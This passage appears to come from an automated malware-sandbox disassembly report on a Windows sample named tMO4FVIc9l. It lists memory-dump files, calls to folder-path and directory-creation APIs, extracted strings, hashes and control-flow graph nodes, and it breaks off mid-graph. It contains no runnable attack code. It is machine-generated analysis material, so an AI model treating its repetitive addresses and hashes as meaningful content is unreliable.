                                  • Associated: 00000000.00000002.2257697982.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DF9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E2C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E5D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000ED7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_820000_tMO4FVIc9l.jbxd
                                  Similarity
                                  • API ID: CreateDirectory$Cpp_errorThrow_std::_$ErrorFolderLastPath
                                  • String ID:
                                  • API String ID: 2071525408-0
                                  • Opcode ID: 916b3f0a3fb4773f4bf3a1ee9a2a1ff1e91fbd91dbc9470062b85aaf1dce438d
                                  • Instruction ID: 09264c5873efab170a5190d380758e7630e5e7f2fc74c5498ef04e5161362b8e
                                  • Opcode Fuzzy Hash: 916b3f0a3fb4773f4bf3a1ee9a2a1ff1e91fbd91dbc9470062b85aaf1dce438d
                                  • Instruction Fuzzy Hash: 75F3CEB4D0426D8BDF25CF98D991AEEBBB0BF58300F1041A9D849B7341DB345A85CFA6
                                  APIs
                                    • Part of subcall function 00906CA0: GetLastError.KERNEL32(?,?,?,00000006,00000005,00000005), ref: 00906D07
                                  • SHGetFolderPathA.SHELL32(00000000,00000000,00000000,00000000,?), ref: 008A27AB
                                  • SHGetFolderPathA.SHELL32(00000000,00000005,00000000,00000000,?,?,?,?,?,?,?,?), ref: 008A2AA7
                                  • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 008A2DA5
                                  • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 008A3105
                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 008A3433
                                  • SHGetFolderPathA.SHELL32(00000000,00000008,00000000,00000000,?), ref: 008A3737
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 008A44E1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2257253231.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000000.00000002.2257233006.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257375774.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257400311.00000000009A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257416652.00000000009AA000.00000020.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257497150.0000000000AD3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257511767.0000000000AD4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DF9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E2C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E5D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000ED7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_820000_tMO4FVIc9l.jbxd
                                  Similarity
                                  • API ID: FolderPath$Concurrency::cancel_current_taskErrorLast
                                  • String ID: cannot compare iterators of different containers$cannot get value$type must be boolean, but is $type must be string, but is
                                  • API String ID: 1377278223-2698695959
                                  • Opcode ID: 0902736a9f2d1dea34e5be634380547a4dc23601677137a7051795bf31b70392
                                  • Instruction ID: 2df43f7ebf9bd5f5c3dc008fa6f0f5cf357a6ae64ef09fcbf1064d8299908152
                                  • Opcode Fuzzy Hash: 0902736a9f2d1dea34e5be634380547a4dc23601677137a7051795bf31b70392
                                  • Instruction Fuzzy Hash: 524302B0D052688BDB25CF28C894BEDBBB5FF59304F1082D9D849A7281EB756B84CF51
                                  APIs
                                  • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,?,?,?), ref: 008BF224
                                  • CreateDirectoryA.KERNEL32(?,00000000,00000000), ref: 008C1C76
                                    • Part of subcall function 00906CA0: GetLastError.KERNEL32(?,?,?,00000006,00000005,00000005), ref: 00906D07
                                  • CreateDirectoryA.KERNEL32(?,00000000,?,?,?,?,00000000), ref: 008C1F5D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2257253231.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000000.00000002.2257233006.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257375774.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257400311.00000000009A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257416652.00000000009AA000.00000020.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257497150.0000000000AD3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257511767.0000000000AD4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DF9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E2C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E5D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000ED7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_820000_tMO4FVIc9l.jbxd
                                  Similarity
                                  • API ID: CreateDirectory$ErrorFolderLastPath
                                  • String ID: ;Yb.$cannot use operator[] with a string argument with $cannot use push_back() with $~]d
                                  • API String ID: 3244528402-1763774129
                                  • Opcode ID: a0476902ff16c754061a73c854f984500ff22a612150405d7c2c66026751d782
                                  • Instruction ID: 8ecf44c077716dd5aa063707fdc91eb052cb1cfc83dbcedac2d0bff1828b0943
                                  • Opcode Fuzzy Hash: a0476902ff16c754061a73c854f984500ff22a612150405d7c2c66026751d782
                                  • Instruction Fuzzy Hash: 0F93DDB4D052688ADB65CF28C991BEDBBB1BF59300F1081EAD84DA7241DB746BC4CF46

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 4731 91ad00-91ad1e call 91bf00 4734 91ad24-91ad2d 4731->4734 4735 91b35e-91b364 4731->4735 4736 91ad33-91ad39 4734->4736 4737 91ad2f-91ad31 4734->4737 4738 91ad3b-91ad3d 4736->4738 4739 91ad3f-91ad50 4736->4739 4740 91ad53-91ad59 4737->4740 4738->4740 4739->4740 4741 91ad63-91ad6a 4740->4741 4742 91ad5b-91ad61 4740->4742 4743 91ad72-91ad8f call 96a0f0 4741->4743 4744 91ad6c 4741->4744 4742->4743 4747 91ad95-91ada7 call 8559b0 4743->4747 4748 91b348 4743->4748 4744->4743 4754 91ada9-91adb0 4747->4754 4755 91adeb-91adf0 4747->4755 4749 91b34a 4748->4749 4751 91b34f-91b354 call 96b110 4749->4751 4761 91b356-91b35b 4751->4761 4759 91adb2-91adc4 call 969d90 4754->4759 4760 91adc9-91add9 4754->4760 4757 91adf2-91adf9 4755->4757 4758 91adfc-91aeb4 call 96a8c0 4755->4758 4757->4758 4769 91aeb6-91aec4 call 9675d0 4758->4769 4770 91af19-91af88 call 91b370 * 4 4758->4770 4759->4749 4760->4755 4768 91addb-91ade6 call 969d90 4760->4768 4761->4735 4768->4749 4777 91aec7 4769->4777 4779 91aec9-91aece 4770->4779 4795 91af8e 4770->4795 4777->4779 4781 91aed0-91aed7 4779->4781 4782 91aeda-91aee2 4779->4782 4781->4782 4784 91aee8-91aeed 4782->4784 4785 91b31b-91b321 4782->4785 4784->4785 4790 91aef3-91aef8 4784->4790 4785->4749 4787 91b323-91b32c 4785->4787 4787->4751 4791 91b32e-91b330 4787->4791 4790->4785 4793 91aefe-91af18 4790->4793 4791->4761 4794 91b332-91b347 4791->4794 4796 91af93-91af97 4795->4796 4796->4796 4797 91af99-91afaf 4796->4797 4798 91afb1-91afbd 4797->4798 4799 91b000 4797->4799 4800 91aff0-91affe 4798->4800 4801 91afbf-91afc1 4798->4801 4802 91b002-91b015 call 9661b0 4799->4802 4800->4802 4803 91afc3-91afe2 4801->4803 4807 91b017-91b01a 4802->4807 4808 91b01c 4802->4808 4803->4803 4805 91afe4-91afed 4803->4805 4805->4800 4809 91b01e-91b063 call 91b370 call 91b5d0 4807->4809 4808->4809 4814 91b083-91b0d1 call 93ba20 * 2 4809->4814 4815 91b065-91b07e call 9675d0 4809->4815 4814->4777 4822 91b0d7-91b102 call 9675d0 call 91b710 4814->4822 4815->4777 4827 91b1a4-91b1b2 4822->4827 4828 91b108-91b10d 4822->4828 4830 91b2c1-91b2cb 4827->4830 4831 91b1b8-91b1bd 4827->4831 4829 91b110-91b114 4828->4829 4829->4829 4832 91b116-91b127 4829->4832 4833 91b2cd-91b2d2 4830->4833 4834 91b2df-91b2e3 4830->4834 4835 91b1c0-91b1c7 4831->4835 4836 91b133-91b14b call 93bbd0 4832->4836 4837 91b129-91b130 4832->4837 4833->4834 4838 91b2d4-91b2d9 4833->4838 4834->4779 4839 91b2e9-91b2ef 4834->4839 4840 91b1c9-91b1cb 4835->4840 4841 91b1cd-91b1dc 4835->4841 4852 91b169-91b16e 4836->4852 4853 91b14d-91b166 call 91b710 4836->4853 4837->4836 4838->4779 4838->4834 4839->4779 4843 91b2f5-91b30e call 9675d0 call 91bbd0 4839->4843 4844 91b1e8-91b1ee 4840->4844 4841->4844 4855 91b1de-91b1e5 4841->4855 4869 91b313-91b316 4843->4869 4845 91b1f0-91b1f5 4844->4845 4846 91b1f7-91b1fc 4844->4846 4851 91b1ff-91b201 4845->4851 4846->4851 4856 91b203-91b20a 4851->4856 4857 91b20d-91b214 4851->4857 4860 91b170-91b180 call 9675d0 4852->4860 4861 91b185-91b18f 4852->4861 4853->4852 4855->4844 4856->4857 4866 91b242-91b244 4857->4866 4867 91b216-91b227 4857->4867 4860->4861 4864 91b191-91b198 4861->4864 4865 91b19b-91b19e 4861->4865 4864->4865 4865->4827 4873 91b1a0 4865->4873 4871 91b2b0-91b2bb 4866->4871 4872 91b246-91b24d 4866->4872 4881 91b229-91b23c call 9675d0 4867->4881 4882 91b23f 4867->4882 4869->4779 4871->4830 4871->4835 4875 91b2a6 4872->4875 4876 91b24f-91b256 4872->4876 4873->4827 4883 91b2ad 4875->4883 4879 91b262-91b282 4876->4879 4880 91b258-91b25f 4876->4880 4888 91b284 4879->4888 4889 91b28a-91b29b 4879->4889 4880->4879 4881->4882 4882->4866 4883->4871 4888->4889 4889->4871 4891 91b29d-91b2a4 4889->4891 4891->4883
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2257253231.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000000.00000002.2257233006.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257375774.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257400311.00000000009A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257416652.00000000009AA000.00000020.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257497150.0000000000AD3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257511767.0000000000AD4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DF9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E2C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E5D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000ED7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_820000_tMO4FVIc9l.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: BINARY$MATCH$NOCASE$RTRIM$automatic extension loading failed: %s$no such vfs: %s$sqlite_rename_table
                                  • API String ID: 0-1885142750
                                  • Opcode ID: 96da494524bdeb473ece502e93d04e0d423dcb8ee588bdd4fe13170fb219bf13
                                  • Instruction ID: 1a3906f36c4a1f7239e341ac5544e5b1997ef0bfd55ceb294131ee9b0d7b7744
                                  • Opcode Fuzzy Hash: 96da494524bdeb473ece502e93d04e0d423dcb8ee588bdd4fe13170fb219bf13
                                  • Instruction Fuzzy Hash: 9B026C70B047089FEB219F29DC457AB77E9EF81304F18442CE86A87291E7B5E985CBD1

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 5838 95f550-95f568 5839 95f5b3-95f5b7 5838->5839 5840 95f56a-95f56f 5838->5840 5843 95f5c1-95f5cb 5839->5843 5844 95f5b9-95f5bb 5839->5844 5841 95f571-95f577 5840->5841 5842 95f579 5840->5842 5841->5842 5845 95f581-95f58c 5841->5845 5842->5845 5847 95f5d3-95f5e7 call 960540 5843->5847 5848 95f5cd-95f5d1 5843->5848 5844->5843 5846 95f6c6-95f6cd 5844->5846 5849 95f59e-95f5af call 963e60 5845->5849 5850 95f58e 5845->5850 5858 95f601 5847->5858 5859 95f5e9-95f5ef 5847->5859 5851 95f605-95f60a 5848->5851 5849->5839 5853 95f590-95f59c 5850->5853 5854 95f610-95f624 5851->5854 5855 95f81d-95f821 5851->5855 5853->5849 5853->5853 5867 95f629-95f634 5854->5867 5860 95f823-95f83b 5855->5860 5861 95f86c-95f872 5855->5861 5858->5851 5863 95f5f6 5859->5863 5864 95f5f1-95f5f4 5859->5864 5880 95f864-95f868 5860->5880 5881 95f83d-95f843 5860->5881 5865 95f90e-95f938 5861->5865 5866 95f878-95f896 5861->5866 5868 95f5f9-95f600 5863->5868 5864->5863 5864->5868 5869 95f956-95f95d 5865->5869 5870 95f93a-95f94e call 960af0 5865->5870 5882 95f89c-95f8a0 5866->5882 5883 95f6bf-95f6c1 call 961710 5866->5883 5871 95f801 5867->5871 5872 95f63a-95f63e 5867->5872 5877 95f982-95f986 5869->5877 5878 95f95f-95f96a 5869->5878 5870->5881 5897 95f954 5870->5897 5876 95f803-95f805 5871->5876 5872->5871 5879 95f644-95f65f 5872->5879 5885 95f6bb 5876->5885 5886 95f80b-95f817 5876->5886 5891 95f98c-95f990 5877->5891 5892 95fa2a-95fa2f 5877->5892 5887 95f970-95f97c 5878->5887 5888 95facf-95fad1 5878->5888 5879->5871 5913 95f665-95f669 5879->5913 5880->5861 5889 95f845-95f848 5881->5889 5890 95f84e-95f863 call 961710 5881->5890 5893 95f8f1-95f906 call 961490 5882->5893 5894 95f8a2-95f8ca 5882->5894 5883->5846 5885->5883 5886->5855 5886->5869 5887->5877 5887->5888 5888->5846 5899 95fad7-95fae5 call 961710 5888->5899 5889->5885 5889->5890 5902 95f992-95f995 5891->5902 5903 95f99a-95f9aa 5891->5903 5895 95fa31-95fa41 call 961710 5892->5895 5896 95fa42-95fa46 5892->5896 5893->5885 5925 95f90c 5893->5925 5894->5883 5927 95f8d0-95f8d5 5894->5927 5909 95fa6d-95fa70 5896->5909 5910 95fa48-95fa59 5896->5910 5897->5869 5905 95fa1c-95fa22 5902->5905 5906 95f9ac-95f9bc 5903->5906 5907 95f9f8 5903->5907 5905->5892 5916 95fa24 5905->5916 